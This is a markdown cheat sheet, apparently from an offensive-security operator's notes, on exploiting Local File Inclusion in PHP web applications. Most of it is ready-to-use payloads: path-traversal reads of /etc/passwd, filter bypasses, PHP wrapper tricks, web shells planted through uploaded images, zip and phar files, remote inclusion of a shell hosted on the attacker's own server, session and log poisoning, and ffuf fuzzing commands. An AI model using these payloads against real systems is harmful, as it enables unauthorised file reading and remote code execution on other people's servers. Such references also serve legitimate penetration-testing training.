lfi.md (5101B)
1 --- 2 title: "LFI" 3 description: "LFI — operator reference." 4 category: enumeration 5 tags: ["enumeration", "adcs", "file-inclusion"] 6 tools: ["ffuf"] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Enumeration/LFI - Cheat Sheet.md" 10 --- 11 ## Local File Inclusion 12 13 |**Command**|**Description**| 14 |---|---| 15 |**Basic LFI**|| 16 |`/index.php?language=/etc/passwd`|Basic LFI| 17 |`/index.php?language=../../../../etc/passwd`|LFI with path traversal| 18 |`/index.php?language=/../../../etc/passwd`|LFI with name prefix| 19 |`/index.php?language=./languages/../../../../etc/passwd`|LFI with approved path| 20 |**LFI Bypasses**|| 21 |`/index.php?language=....//....//....//....//etc/passwd`|Bypass basic path traversal filter| 22 |`/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64`|Bypass filters with URL encoding| 23 |`/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]`|Bypass appended extension with path truncation (obsolete)| 24 |`/index.php?language=../../../../etc/passwd%00`|Bypass appended extension with null byte (obsolete)| 25 |`/index.php?language=php://filter/read=convert.base64-encode/resource=config`|Read PHP with base64 filter| 26 27 ## Remote Code Execution 28 29 |**Command**|**Description**| 30 |---|---| 31 |**PHP Wrappers**|| 32 |`/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id`|RCE with data wrapper| 33 |`curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"`|RCE with input wrapper| 34 |`curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"`|RCE with expect wrapper| 35 |**RFI**|| 36 |`echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>`|Host web shell| 37 |`/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id`|Include remote PHP web shell| 38 |**LFI + Upload**|| 39 |`echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif`|Create malicious image| 40 |`/index.php?language=./profile_images/shell.gif&cmd=id`|RCE with malicious uploaded image| 41 |`echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php`|Create malicious zip archive 'as jpg'| 42 |`/index.php?language=zip://shell.zip%23shell.php&cmd=id`|RCE with malicious uploaded zip| 43 |`php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg`|Create malicious phar 'as jpg'| 44 |`/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id`|RCE with malicious uploaded phar| 45 |**Log Poisoning**|| 46 |`/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd`|Read PHP session parameters| 47 |`/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E`|Poison PHP session with web shell| 48 |`/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id`|RCE through poisoned PHP session| 49 |`curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'`|Poison server log| 50 |`/index.php?language=/var/log/apache2/access.log&cmd=id`|RCE through poisoned PHP session| 51 52 ## Misc 53 54 |**Command**|**Description**| 55 |---|---| 56 |`ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287`|Fuzz page parameters| 57 |`ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287`|Fuzz LFI payloads| 58 |`ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287`|Fuzz webroot path| 59 |`ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287`|Fuzz server configurations| 60 |[LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)|| 61 |[LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt)|| 62 |[Webroot path wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt)|| 63 |[Webroot path wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt)|| 64 |[Server configurations wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux)|| 65 |[Server configurations wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows)|| 66 67 ## File Inclusion Functions 68 69 |**Function**|**Read Content**|**Execute**|**Remote URL**| 70 |---|:-:|:-:|:-:| 71 |**PHP**|||| 72 |`include()`/`include_once()`|Yes|Yes|Yes| 73 |`require()`/`require_once()`|Yes|Yes|No| 74 |`file_get_contents()`|Yes|No|Yes| 75 |`fopen()`/`file()`|Yes|No|No| 76 |**NodeJS**|||| 77 |`fs.readFile()`|Yes|No|No| 78 |`fs.sendFile()`|Yes|No|No| 79 |`res.render()`|Yes|Yes|No| 80 |**Java**|||| 81 |`include`|Yes|No|No| 82 |`import`|Yes|Yes|Yes| 83 |**.NET**|||| 84 |`@Html.Partial()`|Yes|No|No| 85 |`@Html.RemotePartial()`|Yes|No|Yes| 86 |`Response.WriteFile()`|Yes|No|No| 87 |`include`|Yes|Yes|Yes|